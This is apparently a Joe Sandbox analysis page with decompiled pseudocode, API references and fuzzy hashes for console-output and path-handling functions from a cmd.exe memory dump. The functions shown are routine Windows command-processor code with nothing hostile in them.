                                    • API ID: wcschr$iswdigit
                                    • String ID: +-~!$<>+-*/%()|^&=,
                                    • API String ID: 2770779731-632268628
                                    • Opcode ID: b799eddfbb1f0417292e687751c4a38237a04b623e496bf669328b718f11489d
                                    • Instruction ID: 0d3cac2b9771f7124005ed13b5228e74fb370cb20230452fd0d6071d9c53e047
                                    • Opcode Fuzzy Hash: b799eddfbb1f0417292e687751c4a38237a04b623e496bf669328b718f11489d
                                    • Instruction Fuzzy Hash: E61194B6604302EF9B2C9B1EE85997677E8EFAA675320042EF581C7581FF21D800C761
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 011DB610, Relevance: 12.2, APIs: 8, Instructions: 188COMMON
                                    Download Yara Rule
                                    C-Code - Quality: 50%
                                    			E011DB610(void* __ebx, void** __ecx, void* __edi) {
				void _v8;
				intOrPtr _v12;
				void* _v16;
				void* _t37;
				intOrPtr _t39;
				void* _t40;
				void* _t52;
				long _t55;
				long _t56;
				void* _t57;
				long _t61;
				void* _t66;
				long _t73;
				void* _t85;
				void* _t87;
				void** _t101;
				long _t104;

				_t101 = __ecx;
				_t37 = E011E269C(E011DB6B9(__ecx));
				_t104 = _t101[4];
				if(_t37 != 0) {
					_t39 = _t104 + _t101[2] * 2;
					_v12 = _t39;
					__eflags = _t104 - _t39;
					if(_t104 < _t39) {
						_t85 = 0x2022;
						while(1) {
							_t73 = _t104;
							__eflags = _t104 - _t39;
							if(_t104 >= _t39) {
								goto L3;
							} else {
								goto L12;
							}
							while(1) {
								L12:
								__eflags =  *_t73 - _t85;
								if( *_t73 == _t85) {
									break;
								}
								_t73 = 2 + _t73;
								__eflags = _t73 - _t39;
								if(_t73 < _t39) {
									continue;
								}
								break;
							}
							__eflags = _t73 - _t104;
							if(_t73 == _t104) {
								goto L20;
							} else {
								_t66 = _t73 - _t104 >> 1;
								_v16 = _t66;
								__imp___get_osfhandle(0);
								_t54 = WriteConsoleW(_t66, 1, _t104, _t66,  &_v8);
								__eflags = _t54;
								if(_t54 == 0) {
									goto L30;
								} else {
									_t54 = _v16;
									__eflags = _v8 - _v16;
									if(_v8 != _v16) {
										goto L30;
									} else {
										_t39 = _v12;
										_t104 = _t73;
										_t85 = 0x2022;
										while(1) {
											L20:
											__eflags = _t73 - _t39;
											if(_t73 >= _t39) {
												break;
											}
											__eflags =  *_t73 - _t85;
											if( *_t73 == _t85) {
												_t73 = 2 + _t73;
												__eflags = _t73;
												continue;
											}
											break;
										}
										__eflags = _t73 - _t104;
										if(_t73 == _t104) {
											L27:
											_t85 = 0x2022;
											__eflags = _t104 - _t39;
											if(_t104 < _t39) {
												continue;
											} else {
												goto L3;
											}
										} else {
											__eflags =  *_t101;
											if( *_t101 != 0) {
												SetConsoleMode( *_t101, 2);
											}
											_t52 = _t73 - _t104 >> 1;
											_v16 = _t52;
											__imp___get_osfhandle(_t104, _t52,  &_v8, 0);
											_t87 = 1;
											_t104 = WriteConsoleW(_t52, ??, ??, ??, ??);
											_t54 = E011E06C0(_t87);
											__eflags = _t104;
											if(_t104 == 0) {
												goto L30;
											} else {
												_t54 = _v16;
												__eflags = _v8 - _v16;
												if(_v8 != _v16) {
													goto L30;
												} else {
													_t39 = _v12;
													_t104 = _t73;
													goto L27;
												}
											}
										}
									}
								}
							}
							goto L38;
						}
					}
					goto L3;
				} else {
					if(E011E27C8(_t101[2] + _t101[2], _t104, _t101[2] + _t101[2],  &_v8) == 0) {
						L30:
						_t89 = 1;
						_t55 = E011E0178(_t54);
						__eflags = _t55;
						if(_t55 == 0) {
							_t89 = 1;
							_t56 = E011F9953(_t55, 1);
							__eflags = _t56;
							if(_t56 == 0) {
								_push(_t56);
								_push(0x70);
								goto L34;
							}
						} else {
							_push(0);
							_push(0x1d);
							L34:
							E011DC5A2(_t89);
							_pop(_t89);
						}
						_t57 = E011F9287(_t89);
						__imp__longjmp(0x120b8b8, 1);
						asm("int3");
						__eflags =  *(_t104 + 4) - _t57;
						if(__eflags < 0) {
							return _t57;
						} else {
							E011F3BB0(__eflags, 0);
							 *(_t104 + 4) =  *(_t104 + 4) & 0x00000000;
							E011E4F29(_t104);
							_t61 =  *((intOrPtr*)(_t104 + 0x1c)) - 1;
							__eflags = _t61;
							 *(_t104 + 0x24) = _t61;
							return _t61;
						}
					} else {
						_t70 = _t101[2];
						_t54 = _t101[2] + _t70;
						if(_v8 != _t101[2] + _t70) {
							goto L30;
						} else {
							L3:
							_t40 = E011E269C(_t39);
							if(_t40 != 0) {
								__imp___get_osfhandle(0);
								WriteConsoleW( &_v8, 1, L"\r\n", 2,  &_v8);
							} else {
								E011E27C8( &_v8, L"\r\n", 4,  &_v8);
							}
							_t101[1] = _t101[1] + E011DBED7(_t101, _t101[4]) + 1;
							E011DB6B9(_t101);
							if(_t101[1] > _t101[7]) {
								_t101[1] = _t101[1] & 0x00000000;
							}
							 *(_t101[4]) = 0;
							_t101[2] = _t101[2] & 0;
							return 0;
						}
					}
				}
				L38:
			}




















                                    0x011db61b
                                    0x011db625
                                    0x011db62a
                                    0x011db62f
                                    0x011e983d
                                    0x011e9840
                                    0x011e9843
                                    0x011e9845
                                    0x011e984b
                                    0x011e9850
                                    0x011e9850
                                    0x011e9852
                                    0x011e9854
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x011e985a
                                    0x011e985a
                                    0x011e985a
                                    0x011e985d
                                    0x00000000
                                    0x00000000
                                    0x011e985f
                                    0x011e9862
                                    0x011e9864
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x011e9864
                                    0x011e9866
                                    0x011e9868
                                    0x00000000
                                    0x011e986a
                                    0x011e9874
                                    0x011e987a
                                    0x011e987d
                                    0x011e9885
                                    0x011e988b
                                    0x011e988d
                                    0x00000000
                                    0x011e9893
                                    0x011e9893
                                    0x011e9896
                                    0x011e9899
                                    0x00000000
                                    0x011e989f
                                    0x011e989f
                                    0x011e98a2
                                    0x011e98a4
                                    0x011e98b3
                                    0x011e98b3
                                    0x011e98b3
                                    0x011e98b5
                                    0x00000000
                                    0x00000000
                                    0x011e98ab
                                    0x011e98ae
                                    0x011e98b0
                                    0x011e98b0
                                    0x00000000
                                    0x011e98b0
                                    0x00000000
                                    0x011e98ae
                                    0x011e98b7
                                    0x011e98b9
                                    0x011e9903
                                    0x011e9903
                                    0x011e9908
                                    0x011e990a
                                    0x00000000
                                    0x011e9910
                                    0x00000000
                                    0x011e9910
                                    0x011e98bb
                                    0x011e98bb
                                    0x011e98be
                                    0x011e98c4
                                    0x011e98c4
                                    0x011e98d4
                                    0x011e98da
                                    0x011e98dd
                                    0x011e98e3
                                    0x011e98eb
                                    0x011e98ed
                                    0x011e98f2
                                    0x011e98f4
                                    0x00000000
                                    0x011e98f6
                                    0x011e98f6
                                    0x011e98f9
                                    0x011e98fc
                                    0x00000000
                                    0x011e98fe
                                    0x011e98fe
                                    0x011e9901
                                    0x00000000
                                    0x011e9901
                                    0x011e98fc
                                    0x011e98f4
                                    0x011e98b9
                                    0x011e9899
                                    0x011e988d
                                    0x00000000
                                    0x011e9868
                                    0x011e9850
                                    0x00000000
                                    0x011db635
                                    0x011db64b
                                    0x011e9934
                                    0x011e9936
                                    0x011e9937
                                    0x011e993c
                                    0x011e993e
                                    0x011e9948
                                    0x011e9949
                                    0x011e994e
                                    0x011e9950
                                    0x011e9952
                                    0x011e9953
                                    0x00000000
                                    0x011e9953
                                    0x011e9940
                                    0x011e9940
                                    0x011e9942
                                    0x011e9955
                                    0x011e9955
                                    0x011e995b
                                    0x011e995b
                                    0x011e995c
                                    0x011e9968
                                    0x011e996e
                                    0x011e996f
                                    0x011e9972
                                    0x011db6ca
                                    0x011e9978
                                    0x011e997a
                                    0x011e997f
                                    0x011e9985
                                    0x011e998d
                                    0x011e998d
                                    0x011e998e
                                    0x011e9992
                                    0x011e9992
                                    0x011db651
                                    0x011db651
                                    0x011db654
                                    0x011db659
                                    0x00000000
                                    0x011db65f
                                    0x011db65f
                                    0x011db662
                                    0x011db66c
                                    0x011e9921
                                    0x011e9929
                                    0x011db672
                                    0x011db67d
                                    0x011db67d
                                    0x011db68f
                                    0x011db692
                                    0x011db69d
                                    0x011db6b3
                                    0x011db6b3
                                    0x011db6a4
                                    0x011db6a7
                                    0x011db6b2
                                    0x011db6b2
                                    0x011db659
                                    0x011db64b
                                    0x00000000

                                    APIs
                                      • Part of subcall function 011E269C: _get_osfhandle.MSVCRT ref: 011E26A7
                                      • Part of subcall function 011E269C: GetFileType.API-MS-WIN-CORE-FILE-L1-1-0(00000000,011DC5F8,?,?,?), ref: 011E26B6
                                      • Part of subcall function 011E269C: GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(000000F6,?,?,?,?,?,?,?,?,?,?,?,?,?,?,011DC5C6), ref: 011E26D2
                                      • Part of subcall function 011E269C: AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(01217F20,00000002), ref: 011E26E1
                                      • Part of subcall function 011E269C: GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000,?), ref: 011E26EC
                                      • Part of subcall function 011E269C: ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(01217F20,?,?,?,?,?,?,?,?,?,?,?,?,?,?,011DC5C6), ref: 011E26F5
                                    • _get_osfhandle.MSVCRT ref: 011E987D
                                    • WriteConsoleW.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000,011E64F0,?,?,?,?,?,?,?,00000000,?,00000001), ref: 011E9885
                                    • SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,00000002,?,?,?,?,00000000,011E65F0,?,011E64F0), ref: 011E98C4
                                    • _get_osfhandle.MSVCRT ref: 011E98DD
                                    • WriteConsoleW.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000,011E64F0,?,?,?,?,?,?,?,00000000,?,00000001), ref: 011E98E5
                                      • Part of subcall function 011E27C8: _get_osfhandle.MSVCRT ref: 011E27DB
                                      • Part of subcall function 011E27C8: WideCharToMultiByte.API-MS-WIN-CORE-STRING-L1-1-0(00000000,0120B980,000000FF,011FD620,00002000,00000000,00000000), ref: 011E281C
                                      • Part of subcall function 011E27C8: WriteFile.API-MS-WIN-CORE-FILE-L1-1-0(?,011FD620,-00000001,?,00000000), ref: 011E2831
                                    • longjmp.MSVCRT(0120B8B8,00000001,?,?,?,?,?,?,?,00000000,?,00000001), ref: 011E9968
                                    Memory Dump Source
                                    • Source File: 0000000B.00000002.941712573.00000000011D0000.00000040.00020000.sdmp, Offset: 011D0000, based on PE: true
                                    • Associated: 0000000B.00000002.941862977.0000000001219000.00000040.00020000.sdmp Download File
                                    • Associated: 0000000B.00000002.941891236.000000000121D000.00000040.00020000.sdmp Download File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_11_2_11d0000_cmd.jbxd
                                    Similarity
                                    • API ID: Console_get_osfhandle$Write$FileLockModeShared$AcquireByteCharHandleMultiReleaseTypeWidelongjmp
                                    • String ID:
                                    • API String ID: 1333215474-0
                                    • Opcode ID: 1f639f789ca2a11a37d29074f53759e086d6987f0845b3ae85ce0b2c057ca22a
                                    • Instruction ID: 4b6af5c88d5ffea4c74fa34773138b1681615abdef8cfce3835f756827ae972a
                                    • Opcode Fuzzy Hash: 1f639f789ca2a11a37d29074f53759e086d6987f0845b3ae85ce0b2c057ca22a
                                    • Instruction Fuzzy Hash: FC51C531B0070AEBDB2CEBB8D85DB6EB7E8EB14709F05452AE502D7281EB70D940CB55
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 011DC923, Relevance: 10.8, APIs: 7, Instructions: 281COMMON
                                    Download Yara Rule
                                    C-Code - Quality: 85%
                                    			E011DC923(signed short** __ecx) {
				signed short* _v8;
				intOrPtr _v12;
				int _v16;
				signed int _v20;
				intOrPtr _v24;
				signed short _t33;
				signed int _t34;
				intOrPtr _t35;
				WCHAR* _t36;
				signed int _t38;
				void* _t39;
				signed int _t40;
				signed int _t41;
				WCHAR* _t42;
				WCHAR* _t47;
				signed int _t48;
				signed int _t49;
				void* _t54;
				long _t56;
				int _t62;
				signed short _t64;
				signed int _t69;
				signed int _t70;
				signed short* _t72;
				signed short* _t74;
				intOrPtr _t75;
				WCHAR* _t77;
				signed int _t79;
				signed char _t80;
				signed short* _t82;
				WCHAR* _t84;
				WCHAR* _t90;
				signed int _t95;
				signed short* _t107;
				signed int _t108;
				short* _t109;
				short* _t111;
				WCHAR* _t114;
				void* _t115;
				void* _t116;
				void* _t117;
				WCHAR** _t121;
				signed short* _t122;
				signed int _t124;
				WCHAR* _t125;
				WCHAR* _t126;
				WCHAR* _t129;
				int _t130;
				signed int _t131;
				WCHAR* _t132;

				_t121 = __ecx;
				_v12 = 0x11d1f8c;
				 *0x1213cf0 = 0;
				_t82 =  *__ecx;
				_t122 = _t82;
				_t2 =  &(_t122[1]); // 0x2
				_t107 = _t2;
				do {
					_t33 =  *_t122;
					_t122 =  &(_t122[1]);
				} while (_t33 != 0);
				_t34 =  *_t82 & 0x0000ffff;
				_t124 = _t122 - _t107 >> 1;
				_t74 = _t82;
				_v20 = _t124;
				_t108 = _t34;
				if(_t34 == 0) {
					L6:
					_t35 = 0x3a;
					_v8 = _t74;
					_v24 = _t35;
					if(_t108 == _t35) {
						__eflags = _t124 - 2;
						if(_t124 <= 2) {
							goto L7;
						}
						 *_t74 = 0;
						_t24 = _t74 - 2; // -2
						_v8 = _t24;
						_t62 = SetErrorMode(0);
						_t102 =  *_t121;
						_v16 = _t62;
						_t132 = E011DD120( *_t121, 0x8000, _t82);
						__eflags = _t132 - 0xffffffff;
						if(_t132 == 0xffffffff) {
							L49:
							__eflags =  *0x11fd0dc - 4;
							_t64 = 0x3a;
							_v8 = _t74;
							 *_t74 = _t64;
							if( *0x11fd0dc != 4) {
								E011DC5A2(_t102, 0x236b, 1,  *_t121);
							} else {
								__eflags =  *0x11fd5a8;
								if( *0x11fd5a8 == 0) {
									E011DC5A2(_t102, 0x236b, 1,  *_t121);
								}
								 *0x11fd5a4 = 1;
							}
							__eflags = _t132 - 0xffffffff;
							L55:
							if(__eflags == 0) {
								L57:
								SetErrorMode(_v16);
								goto L7;
							}
							L56:
							E011DDB92(_t132);
							goto L57;
						}
						_t69 = E011E0178(_t63);
						__eflags = _t69;
						if(_t69 != 0) {
							L47:
							_t70 = E011E0178(_t69);
							__eflags = _t70;
							if(_t70 != 0) {
								goto L56;
							}
							__eflags = E011F9953(_t70, _t132);
							goto L55;
						}
						_t102 = _t132;
						_t69 = E011F9953(_t69, _t132);
						__eflags = _t69;
						if(_t69 == 0) {
							goto L49;
						}
						goto L47;
					}
					L7:
					_t83 = 0x250;
					_t36 = E011E00B0(0x250);
					if(_t36 == 0) {
						L58:
						E011F9287(_t83);
						__imp__longjmp(0x120b8b8, 1);
						L59:
						_t125 =  *_t121;
						_t75 = 0;
						__eflags = 0;
						_t84 = _t125;
						_t29 =  &(_t84[1]); // 0x0
						_t109 = _t29;
						do {
							_t38 =  *_t84;
							_t84 =  &(_t84[1]);
							__eflags = _t38;
						} while (_t38 != 0);
						__eflags = _t84 - _t109 >> 1 - 2;
						if(_t84 - _t109 >> 1 >= 2) {
							_t38 = 0x3a;
							__eflags = _t125[1] - _t38;
							if(_t125[1] == _t38) {
								_t125 =  &(_t125[2]);
							}
						}
						L11:
						__imp___wcsicmp(_t125, ".");
						if(_t38 == 0) {
							L39:
							_t126 =  *_t121;
							_t39 = 0x5c;
							_t40 = E011E2349(_t126, _t39);
							__eflags = _t40;
							if(_t40 == 0) {
								_t90 = _t126;
								__eflags = 0;
								_t31 =  &(_t90[1]); // 0x0
								_t111 = _t31;
								do {
									_t41 =  *_t90;
									_t90 =  &(_t90[1]);
									__eflags = _t41;
								} while (_t41 != 0);
								__eflags = _t90 - _t111 >> 1 - 2;
								if(_t90 - _t111 >> 1 != 2) {
									goto L40;
								}
								_t54 = 0x3a;
								__eflags = _t126[1] - _t54;
								if(_t126[1] == _t54) {
									L42:
									 *(_t121[6]) = 0x10;
									L17:
									_t79 = 1;
									_t129 = 0;
									_t47 =  *_t121;
									_t114 = _t47;
									while(1) {
										_t95 =  *_t114 & 0x0000ffff;
										if(_t95 == 0) {
											break;
										}
										if(_t95 == _v16) {
											L23:
											_t129 = _t114;
											L21:
											_t114 =  &(_t114[1]);
											_t79 = _t79 + 1;
											continue;
										}
										if(_t95 == _v24) {
											__eflags = _t79 - 2;
											if(_t79 != 2) {
												goto L21;
											}
											goto L23;
										}
										goto L21;
									}
									_t121[3] = _t129;
									__eflags = _t129;
									if(_t129 == 0) {
										_t129 = _t47;
									} else {
										__eflags =  *_t129;
										if( *_t129 == 0) {
											_t47 = _t129;
										} else {
											_t12 =  &(_t129[1]); // 0x2
											_t47 = _t12;
										}
									}
									_t115 = 0x2a;
									_t121[4] = _t47;
									_t48 = E011DD7D4(_t129, _t115);
									__eflags = _t48;
									if(_t48 == 0) {
										_t116 = 0x3f;
										_t49 = E011DD7D4(_t129, _t116);
										__eflags = _t49;
										if(_t49 == 0) {
											goto L29;
										}
										goto L28;
									} else {
										L28:
										_t14 =  &(_t121[7]);
										 *_t14 = _t121[7] | 0x00000008;
										__eflags =  *_t14;
										 *0x1213cd0 = 1;
										L29:
										_t117 = 0x2e;
										_t121[5] = E011DD7D4(_t129, _t117);
										__eflags = 1;
										return 1;
									}
								}
							}
							L40:
							_t77 =  *_t121;
							_t83 = _v20 + 5 + _v20 + 5;
							_t42 = E011E00B0(_v20 + 5 + _v20 + 5);
							__eflags = _t42;
							if(_t42 == 0) {
								goto L58;
							}
							 *_t121 = _t42;
							E011E1040(_t42, _t128, _t77);
							E011E18C0( *_t121, _t128, _v12);
							goto L42;
						}
						__imp___wcsicmp(_t125, L"..");
						if(_t38 == 0) {
							goto L39;
						}
						if( *0x11fd0dc == 4) {
							__eflags =  *0x11fd5ac - 1;
							if( *0x11fd5ac == 1) {
								goto L14;
							}
							__eflags =  *0x11fd0c0 - 1;
							if( *0x11fd0c0 != 1) {
								goto L17;
							}
							 *0x11fd0c0 = _t75;
						}
						L14:
						_t80 = GetFileAttributesW( *_t121);
						if(_t80 != 0xffffffff) {
							_t56 = 0;
						} else {
							_t56 = GetLastError();
						}
						 *0x1213cf0 = _t56;
						if(_t80 != 0xffffffff) {
							__eflags = _t80 & 0x00000010;
							if((_t80 & 0x00000010) == 0) {
								goto L17;
							}
							goto L39;
						} else {
							goto L17;
						}
					}
					_t121[6] = _t36;
					_t130 = 0x5c;
					_v16 = _t130;
					if(( *_v8 & 0x0000ffff) == _t130) {
						_v12 = 0x11d1f8e;
						goto L39;
					}
					_t38 = E011E2349( *_t121, _t130);
					_t131 = _t38;
					if(_t131 == 0) {
						goto L59;
					}
					_t125 = _t131 + 2;
					_t75 = 0;
					goto L11;
				} else {
					goto L4;
					L4:
					_t72 = _t82;
					_t74 = _t82;
					_t82 =  &(_t82[1]);
					if( *_t82 != 0) {
						goto L4;
					} else {
						_t108 =  *_t72 & 0x0000ffff;
						goto L6;
					}
				}
			}





















































                                    0x011dc92e
                                    0x011dc930
                                    0x011dc939
                                    0x011dc93f
                                    0x011dc941
                                    0x011dc943
                                    0x011dc943
                                    0x011dc946
                                    0x011dc946
                                    0x011dc949
                                    0x011dc94c
                                    0x011dc951
                                    0x011dc956
                                    0x011dc958
                                    0x011dc95a
                                    0x011dc95d
                                    0x011dc962
                                    0x011dc975
                                    0x011dc977
                                    0x011dc978
                                    0x011dc97b
                                    0x011dc981
                                    0x011eaff7
                                    0x011eaffa
                                    0x00000000
                                    0x00000000
                                    0x011eb002
                                    0x011eb005
                                    0x011eb008
                                    0x011eb00e
                                    0x011eb015
                                    0x011eb01c
                                    0x011eb024
                                    0x011eb026
                                    0x011eb029
                                    0x011eb057
                                    0x011eb057
                                    0x011eb060
                                    0x011eb061
                                    0x011eb064
                                    0x011eb067
                                    0x011eb098
                                    0x011eb069
                                    0x011eb069
                                    0x011eb070
                                    0x011eb07b
                                    0x011eb080
                                    0x011eb083
                                    0x011eb083
                                    0x011eb0a0
                                    0x011eb0a3
                                    0x011eb0a3
                                    0x011eb0ac
                                    0x011eb0af
                                    0x00000000
                                    0x011eb0af
                                    0x011eb0a5
                                    0x011eb0a7
                                    0x00000000
                                    0x011eb0a7
                                    0x011eb02d
                                    0x011eb032
                                    0x011eb034
                                    0x011eb041
                                    0x011eb043
                                    0x011eb048
                                    0x011eb04a
                                    0x00000000
                                    0x00000000
                                    0x011eb053
                                    0x00000000
                                    0x011eb053
                                    0x011eb036
                                    0x011eb038
                                    0x011eb03d
                                    0x011eb03f
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x011eb03f
                                    0x011dc987
                                    0x011dc987
                                    0x011dc98c
                                    0x011dc993
                                    0x011eb0ba
                                    0x011eb0ba
                                    0x011eb0c6
                                    0x011eb0cc
                                    0x011eb0cc
                                    0x011eb0ce
                                    0x011eb0ce
                                    0x011eb0d0
                                    0x011eb0d2
                                    0x011eb0d2
                                    0x011eb0d5
                                    0x011eb0d5
                                    0x011eb0d8
                                    0x011eb0db
                                    0x011eb0db
                                    0x011eb0e4
                                    0x011eb0e7
                                    0x011eb0ef
                                    0x011eb0f0
                                    0x011eb0f4
                                    0x011eb0fa
                                    0x011eb0fa
                                    0x011eb0f4
                                    0x011dc9c9
                                    0x011dc9cf
                                    0x011dc9d9
                                    0x011dcaf4
                                    0x011dcaf4
                                    0x011dcafa
                                    0x011dcafd
                                    0x011dcb02
                                    0x011dcb04
                                    0x011eb102
                                    0x011eb104
                                    0x011eb106
                                    0x011eb106
                                    0x011eb109
                                    0x011eb109
                                    0x011eb10c
                                    0x011eb10f
                                    0x011eb10f
                                    0x011eb118
                                    0x011eb11b
                                    0x00000000
                                    0x00000000
                                    0x011eb123
                                    0x011eb124
                                    0x011eb128
                                    0x011dcb3a
                                    0x011dcb3d
                                    0x011dca29
                                    0x011dca2b
                                    0x011dca2e
                                    0x011dca30
                                    0x011dca32
                                    0x011dca34
                                    0x011dca34
                                    0x011dca3a
                                    0x00000000
                                    0x00000000
                                    0x011dca40
                                    0x011dca53
                                    0x011dca53
                                    0x011dca48
                                    0x011dca48
                                    0x011dca4b
                                    0x00000000
                                    0x011dca4b
                                    0x011dca46
                                    0x011dca4e
                                    0x011dca51
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x011dca51
                                    0x00000000
                                    0x011dca46
                                    0x011dca57
                                    0x011dca5a
                                    0x011dca5c
                                    0x011eb13a
                                    0x011dca62
                                    0x011dca64
                                    0x011dca67
                                    0x011eb133
                                    0x011dca6d
                                    0x011dca6d
                                    0x011dca6d
                                    0x011dca6d
                                    0x011dca67
                                    0x011dca72
                                    0x011dca75
                                    0x011dca78
                                    0x011dca7d
                                    0x011dca7f
                                    0x011dcaa8
                                    0x011dcaab
                                    0x011dcab0
                                    0x011dcab2
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x011dca81
                                    0x011dca81
                                    0x011dca81
                                    0x011dca81
                                    0x011dca81
                                    0x011dca85
                                    0x011dca8f
                                    0x011dca91
                                    0x011dca99
                                    0x011dcaa0
                                    0x011dcaa5
                                    0x011dcaa5
                                    0x011dca7f
                                    0x011eb12e
                                    0x011dcb0a
                                    0x011dcb0d
                                    0x011dcb12
                                    0x011dcb15
                                    0x011dcb1a
                                    0x011dcb1c
                                    0x00000000
                                    0x00000000
                                    0x011dcb25
                                    0x011dcb29
                                    0x011dcb35
                                    0x00000000
                                    0x011dcb35
                                    0x011dc9e5
                                    0x011dc9ef
                                    0x00000000
                                    0x00000000
                                    0x011dc9fc
                                    0x011dcac8
                                    0x011dcacf
                                    0x00000000
                                    0x00000000
                                    0x011dcad5
                                    0x011dcadc
                                    0x00000000
                                    0x00000000
                                    0x011dcae2
                                    0x011dcae2
                                    0x011dca02
                                    0x011dca0a
                                    0x011dca0f
                                    0x011dcab6
                                    0x011dca15
                                    0x011dca15
                                    0x011dca15
                                    0x011dca1b
                                    0x011dca23
                                    0x011dcabd
                                    0x011dcac0
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x011dca23
                                    0x011dc999
                                    0x011dc9a1
                                    0x011dc9a2
                                    0x011dc9ab
                                    0x011dcaed
                                    0x00000000
                                    0x011dcaed
                                    0x011dc9b5
                                    0x011dc9ba
                                    0x011dc9be
                                    0x00000000
                                    0x00000000
                                    0x011dc9c4
                                    0x011dc9c7
                                    0x00000000
                                    0x011dc964
                                    0x011dc964
                                    0x011dc966
                                    0x011dc966
                                    0x011dc968
                                    0x011dc96a
                                    0x011dc970
                                    0x00000000
                                    0x011dc972
                                    0x011dc972
                                    0x00000000
                                    0x011dc972
                                    0x011dc970

                                    APIs
                                    • _wcsicmp.MSVCRT ref: 011DC9CF
                                    • _wcsicmp.MSVCRT ref: 011DC9E5
                                    • GetFileAttributesW.API-MS-WIN-CORE-FILE-L1-1-0(00000000,-00000001,00000000,?,00000000), ref: 011DCA04
                                    • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 011DCA15
                                      • Part of subcall function 011DD7D4: wcschr.MSVCRT ref: 011DD7DA
                                    Memory Dump Source
                                    • Source File: 0000000B.00000002.941712573.00000000011D0000.00000040.00020000.sdmp, Offset: 011D0000, based on PE: true
                                    • Associated: 0000000B.00000002.941862977.0000000001219000.00000040.00020000.sdmp Download File
                                    • Associated: 0000000B.00000002.941891236.000000000121D000.00000040.00020000.sdmp Download File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_11_2_11d0000_cmd.jbxd
                                    Similarity
                                    • API ID: _wcsicmp$AttributesErrorFileLastwcschr
                                    • String ID:
                                    • API String ID: 2943530692-0
                                    • Opcode ID: 7ba18b117327cd26f8e3882125109a921b07c6f96d276bba31e25228e0a99014
                                    • Instruction ID: e635eb14b41ad880cde4bf3ec2172fe7cba291c3e8be8141d8583cab9848a835
                                    • Opcode Fuzzy Hash: 7ba18b117327cd26f8e3882125109a921b07c6f96d276bba31e25228e0a99014
                                    • Instruction Fuzzy Hash: E3912735B006129BDB3DEFBC985836ABBE1BB48314B15492DD916D72C4FB709981CBC2
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 011E5E50, Relevance: 10.8, APIs: 7, Instructions: 264COMMON
                                    Download Yara Rule
                                    C-Code - Quality: 72%
                                    			E011E5E50(void* __ecx) {
				intOrPtr _v8;
				long _v16;
				signed int _v20;
				char _v28;
				intOrPtr _v36;
				signed int _v48;
				short _v52;
				WCHAR* _v54;
				signed char _v56;
				signed int _v60;
				WCHAR* _v64;
				WCHAR* _v68;
				long _v72;
				long _v80;
				WCHAR* _v88;
				signed char* _v92;
				short _v104;
				char _v108;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t60;
				signed int _t61;
				WCHAR* _t65;
				short _t66;
				void* _t67;
				void* _t68;
				void* _t74;
				short _t77;
				void* _t78;
				short _t82;
				wchar_t* _t85;
				signed char _t86;
				short _t89;
				short _t90;
				wchar_t* _t102;
				long _t103;
				short* _t104;
				short _t105;
				long _t106;
				short* _t109;
				signed int _t110;
				WCHAR* _t114;
				WCHAR* _t126;
				short _t132;
				long _t134;
				WCHAR* _t138;
				short* _t142;
				void* _t147;
				WCHAR* _t149;
				void* _t150;
				signed int _t155;
				signed int _t157;
				short _t163;

				_t110 = _t155;
				_push(__ecx);
				_push(__ecx);
				_t157 = (_t155 & 0xfffffff8) + 4;
				_v8 =  *((intOrPtr*)(_t110 + 4));
				_t153 = _t157;
				_push(0xfffffffe);
				_push(0x11fbe38);
				_push(E011E7290);
				_push( *[fs:0x0]);
				_push(__ecx);
				_push(__ecx);
				_push(_t110);
				_t60 =  *0x11fd0b4; // 0x2833377e
				_v20 = _v20 ^ _t60;
				_t61 = _t60 ^ _t157;
				_v48 = _t61;
				_push(_t61);
				 *[fs:0x0] =  &_v28;
				_v36 = _t157 - 0x48;
				_t65 = E011DEA40( *((intOrPtr*)( *((intOrPtr*)(_t110 + 8)) + 0x3c)), 0, 0 |  *0x1213cc9 != 0x00000000);
				_t149 = _t65;
				_v64 = _t149;
				_v68 = _t149;
				if( *0x1213cc9 == 0) {
					L6:
					_t114 = _t149;
					_t15 =  &(_t114[1]); // 0x2
					_t142 = _t15;
					do {
						_t66 =  *_t114;
						_t114 =  &(_t114[1]);
					} while (_t66 != 0);
					_v60 = _t114 - _t142 >> 1;
					_t67 = E011E22C0(_t110, _t149);
					_t144 = _v60 + 1;
					_t118 = _t149;
					_t68 = E011E1040(_t149, _v60 + 1, _t67);
					 *0x120b8b0 = 0;
					if( *_t149 == 0) {
						E011F83FD(_t68, _t118);
						L18:
						 *[fs:0x0] = _v28;
						_pop(_t147);
						_pop(_t150);
						return E011E6FD0( *0x120b8b0, _t110, _v48 ^ _t153, _t144, _t147, _t150);
					}
					if(E011E5D59(_t110) == 0) {
						_push(0);
						_push(0x40002728);
						L47:
						E011DC5A2(_t118);
						 *0x120b8b0 = 1;
						goto L18;
					}
					if( *0x1213cc9 == 0) {
						L12:
						_t171 =  *0x120b8b0;
						if( *0x120b8b0 != 0) {
							L45:
							_t74 = E011E4B96(_t110, 0, _t149, __eflags);
							RtlFreeHeap(GetProcessHeap(), 0, _t74);
							_push(0);
							_push( *0x120b8b0);
							goto L47;
						}
						_t144 = 0;
						_t118 = _t149;
						_t77 = E011E33FC(_t110, _t149, 0, 0, _t149, _t171);
						 *0x120b8b0 = _t77;
						if(_t77 == 0) {
							_t78 = 0x3a;
							if(_t149[1] == _t78) {
								if( *0x1213cb8 == 0) {
									_t118 = 0x1213ab0;
								}
